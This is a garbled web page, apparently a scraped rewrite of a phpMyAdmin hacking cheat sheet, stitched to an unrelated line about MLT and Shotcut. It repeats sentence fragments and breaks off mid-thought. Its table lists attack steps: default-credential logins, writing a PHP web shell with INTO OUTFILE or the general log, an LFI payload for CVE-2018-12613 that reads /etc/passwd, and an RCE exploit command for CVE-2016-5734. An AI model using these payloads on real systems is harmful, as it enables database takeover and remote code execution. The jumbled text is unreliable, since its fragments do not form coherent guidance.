The easiest way to try out and learn MLT is by downloading
Shotcut.
:
Check accessible static text assets such as /README , /ChangeLog , or /RELEASE-DATE-X.X.X .
: Many installations still use root with no password or common defaults like admin / admin . phpmyadmin hacktricks
Create a malicious .sql file:
Gaining access to the phpMyAdmin dashboard is the most straightforward path to database control. Default and Weak Credentials : Check accessible static text assets such as
Ensure the MySQL user used by phpMyAdmin does not have the FILE privilege.
: Run the following SQL query in the phpMyAdmin SQL box to drop a PHP web shell: Default and Weak Credentials Ensure the MySQL user
| Goal | Technique | Prerequisites | |---|---|---| | | Scan for /readme.php , /changelog.php | None | | Login | Default creds ( root : root ), brute force | None | | Get path | Single quote error, phpinfo() | None | | Check write priv | SHOW VARIABLES LIKE ‘secure_file_priv’ | Authenticated | | Write shell (outfile) | SELECT ‘<?php ... ?>’ INTO OUTFILE | secure_file_priv empty, path known | | Write shell (log) | SET GLOBAL general_log_file=... | Root, path known | | Write shell (table) | Create table with PHP code, include via LFI | LFI vulnerability, path known | | LFI (CVE-2018-12613) | index.php?target=db_sql.php%253f/../../../etc/passwd | Version 4.8.x | | RCE (CVE-2016-5734) | python exploit.py -u root -p root -c “system(‘id’);” | Version 4.3.0 – 4.6.2 |
For further research into securing database administration tools, the following areas are recommended for study: